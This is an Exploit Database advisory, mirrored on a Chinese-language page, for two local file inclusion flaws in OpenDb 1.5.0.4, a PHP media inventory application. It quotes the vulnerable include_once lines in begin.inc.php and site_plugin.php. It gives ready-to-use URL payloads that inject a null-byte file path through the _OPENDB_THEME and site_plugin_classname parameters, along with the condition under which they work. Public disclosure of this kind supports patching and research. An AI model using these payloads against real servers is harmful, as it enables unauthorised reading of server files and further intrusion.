OpenDb 1.5.0.4 – Multiple Local File Inclusions

• Exploit Database
• 13 阅读

• 作者： ViRuSMaN
  日期： 2010-01-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11240/

• ==============================================================================
  __ __ __ __ __ __
  / \ / \ \ \ / / / \ / \
  / /\ \_/ /\ \ \ \ / / / /\ \_/ /\ \
  / / \ _ / \ \ \ \/ / / / \ _ / \ \
  /_/ \_\ \__/ /_/ \_\
  
  ==============================================================================
  [»] ~ Note : Works Only With Magic_Quotes_Gpc = Off .
  ==============================================================================
  [»] OpenDb 1.5.0.4 Multiple LFI Vulnerability
  ==============================================================================
  
  [»] Script: [ OpenDb ]
  [»] Language: [ PHP ]
  [»] Site page: [ The Open Media Collectors Database is a PHP and MySQL based inventory application ]
  [»] Download: [ http://sourceforge.net/projects/opendb/files/ ]
  [»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
  [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
  [»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
  
  ###########################################################################
  
  ===[ Exploit ]===
  #~ [C:\AppServ\www\Scripts\opendb\include\begin.inc.php]
  #~ Line 213 : include_once("./theme/$_OPENDB_THEME/theme.php");
  
  [»] http://target/path/include/begin.inc.php?_OPENDB_THEME=[LFI%00]
  
  
  ===[ Exploit 2 ]===
  #~[C:\AppServ\www\Scripts\opendb\functions\site_plugin.php]
  #~Line 126 : include_once("./site/".$site_plugin_classname.".class.php");
  
  [»] http://target/path/functions/site_plugin.php?site_plugin_classname=[LFI%00]
  
  Author: ViRuSMaN <-
  
  ###########################################################################